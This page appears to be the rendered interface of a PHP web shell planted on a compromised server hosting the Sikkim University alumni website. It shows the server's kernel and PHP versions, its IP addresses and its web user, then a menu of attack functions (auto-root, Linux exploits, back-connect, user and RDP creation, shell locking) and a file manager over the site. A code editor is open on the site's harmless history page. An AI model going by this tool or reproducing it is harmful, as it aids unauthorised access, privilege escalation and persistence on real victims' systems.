Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.145.92.96
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sikkim /
alumni /
[ HOME SHELL ]
Name
Size
Permission
Action
alumni_files
[ DIR ]
drwxr-xr-x
alumni_slides
[ DIR ]
drwxr-xr-x
bootstrap
[ DIR ]
drwxr-xr-x
datepicker
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
javascript
[ DIR ]
drwxr-xr-x
phpscript
[ DIR ]
drwxr-xr-x
alumni.php
1.23
KB
-rwxr-xr-x
constitution.php
1.03
KB
-rwxr-xr-x
contact_us.php
846
B
-rwxr-xr-x
events.php
858
B
-rwxr-xr-x
footer.php
1.34
KB
-rwxr-xr-x
header.php
3.08
KB
-rwxr-xr-x
history.php
1.84
KB
-rwxr-xr-x
index.php
4.25
KB
-rwxr-xr-x
login.php
2.21
KB
-rwxr-xr-x
news.php
848
B
-rwxr-xr-x
objectives.php
850
B
-rwxr-xr-x
password.php
1018
B
-rwxr-xr-x
profile.php
12.3
KB
-rwxr-xr-x
register.php
2.27
KB
-rwxr-xr-x
style.css
15.58
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : history.php
<!DOCTYPE html> <html lang="en"> <head> <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script> </head> <body> <?php include("header.php")?> <div class="bread_area"> <div class="container"> <div class="row"> <div class="col-sm-12"> <ol class="breadcrumb"> <li><a href="#">About Us</a></li> <li class="active">History</li> </ol> </div> </div> </div> </div> <main class="site-main page-main"> <div class="container"> <div class="row"> <div class="page col-sm-12"> <h2 class="page-title">HISTORY</h2> <h5>Establishment of Sikkim University Alumni Association (SUAA)</h5> <p class="text-justify">Sikkim University being one of the youngest universities, the first batch of Master students passed in 2010 and the first PhD was awarded in 2016. Although the constitution of Alumni Association was in place for some time now, the task of bringing it to life took a lot of time as no alumnus came forward to shoulder the responsibility of starting the Association and the same situation stands even today. However, the office of the Dean of Student's Welfare has made one more commendable effort to get the Alumni Association started by opening a web portal through which the alumni can register themselves, keep themselves updated about each other, inform each other about various career opportunities, and so on. We now leave it to the newly constituted SUSA to take the effort the effort of the University forward and make the Alumni Association a reality.</p> <p class="text-justify">We wish them all the best!</p> </div> </div> </div> </main> <?php include("footer.php")?> </body> </html>
Close